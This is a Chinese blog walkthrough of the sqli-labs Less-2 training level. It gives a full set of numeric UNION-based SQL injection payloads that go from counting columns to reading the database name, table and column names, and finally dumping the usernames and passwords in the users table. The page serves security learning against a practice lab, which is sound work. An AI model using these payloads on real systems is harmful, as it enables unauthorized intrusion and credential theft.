首页 > 其他分享 >第二关-less-2:

第二关-less-2:

时间:2024-01-31 18:44:06浏览次数:31  
标签:less union 第二 -- --+ table id select

sqli-labs第二关:

先判断是否存在sql注入漏洞

页面回显返回错误,说明存在sql注入

再判断它的注入点

通过回显可知是数字型注入,然后现在将第一关的sql注入语句改为数字型,就可以注入成功

//判断字段:
?id=1 order by 1 -- +
?id=1 order by 2 -- +
?id=1 order by 3 -- +
?id=1 order by 4 -- +

//爆显示位:
?id=100 union select 1,2,3 --+
?id=-1 union select 1,2,3 --+

//爆数据库名和版本号:
?id=-1 union select 1,database(),version() --+

//爆表名:
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- +

//爆列名:
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//爆出列名对应的数据:
?id=-1 union select 1,group_concat(username),group_concat(password) from users --+

得到用户名和密码

标签:less,union,第二,--,--+,table,id,select
From: https://www.cnblogs.com/xyweiwen/p/17999911

相关文章

  • 《程序是怎样跑起来的》第二章读后感
    本书的第二章围绕数据是用二进制表示的来进行解答,了解信息(数据)在计算机内部是以怎样的形式来表现的,又是以怎样的方法进行运算的。只有了解了使用二进制来表示信息的方法及其运算机制,才能够了解程序的运行机制。计算机之所以用二进制来处理信息数据,是由于IC的所有引脚,只有直流电压......
  • 第二周
    程序是如何跑起来的》是一本介绍计算机工作原理的书籍,第一章主要介绍了计算机的基本概念和发展历程。读完这一章后,我对计算机的工作原理有了更深入的了解,并且对计算机的发展历史也有了更清晰的认识。首先,这本书通过生动的语言和具体的例子,让我了解了计算机的基本概念。在计算机中......
  • IPQ4019: Revolutionizing Long-Range Wireless Connectivity
    UnveilingtheIPQ4019:RevolutionizingLong-RangeWirelessConnectivityIntroduction:TheIPQ4019System-on-Chip(SoC)emergesasagame-changerforPoint-to-Point(PTP)andPoint-to-Multipoint(PTMP)applications,presentingadvancedfeaturestailoredfor......
  • AI 绘画平台难开发,难变现?试试 Stable Diffusion API Serverless 版解决方案
    AI绘画平台难开发,难变现?试试StableDiffusionAPIServerless版解决方案136人阅读14分钟前分享全屏显示Stable Diffusion 模型,已经成为 AI 行业从传统深度学习时代走向 AIGC 时代的标志性里程碑。越来越多的开发者借助 stable-diffusion-webui (以下简称 SDWeb......
  • 周报_第二十三周
    本周主要做的事情是找了最近几年发布的代码,大致看了一下网络结构以及实现,为下面替换做一个准备。运行成功了deformer-detr的代码,将抽取出deformableattention放到模型上面效果非常差,误差是之前的几倍。分析1.可能是代码的问题,有一些参数没有设置好。2.对于deformableattenti......
  • 影刀rpa:第二个项目学习心得
    教程有说到元素的关联操作,教程说自上而下的html路径,一时之间没弄清楚,索性就去看了下网页的html源码,才弄清楚到底是咋回事: 我是先选中了列表子元素的价格字段,选择两次以后就能选择到所有列表子元素的价格字段了: 我们点击编辑,可以看到以web开头的标签,x:name就是html标签的......
  • AI 绘画平台难开发,难变现?试试 Stable Diffusion API Serverless 版解决方案
    作者:王佳、江昱、筱姜StableDiffusion模型,已经成为AI行业从传统深度学习时代走向AIGC时代的标志性里程碑。越来越多的开发者借助stable-diffusion-webui(以下简称SDWebUI)能力进行AI绘画领域创业或者业务上新,获得高流量及商业价值,但是面对多客户、高并发的复杂场景,使用原......
  • web自动化测试复习巩固第二天
    定位方法selenium4:driver.find_element(定位策略用By类,定位表达式)---返回表达式匹配的第一个元素,如果找不到元素,会报错。driver.find_elements(定位策略用By类,定位表达式)---返回表达式匹配的所有元素,返回的是列表类型。By类:管理8种定位方式,每一种定位方......
  • 第二届数字化经济与管理科学国际学术会议(CDEMS 2024)
    【经济&管理|录用率高】第二届数字化经济与管理科学国际学术会议(CDEMS2024)20242nd InternationalConferenceonDigitalEconomyandManagementScience(CDEMS2024) 重要信息 大会官网:www.icdems.com 大会时间:2024年4月26-28日大会地点:武汉(线上线下结合)✱截稿日期:20......
  • 《系统科学方法概论》第二章第一、二节概述
    一.1,系统工程:就是以组织建立或者是经营管理某一系统为目的的工程。2,系统工程内容:系统工程思想,系统工程方法论3,系统工程的本质是:方法论二.系统工程发展史1,古代的系统工程思想和实践例如:都江堰水利工程,2,现代系统工程(1)生产管理系统工程阶段20世纪初至20世纪20年代(2)......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99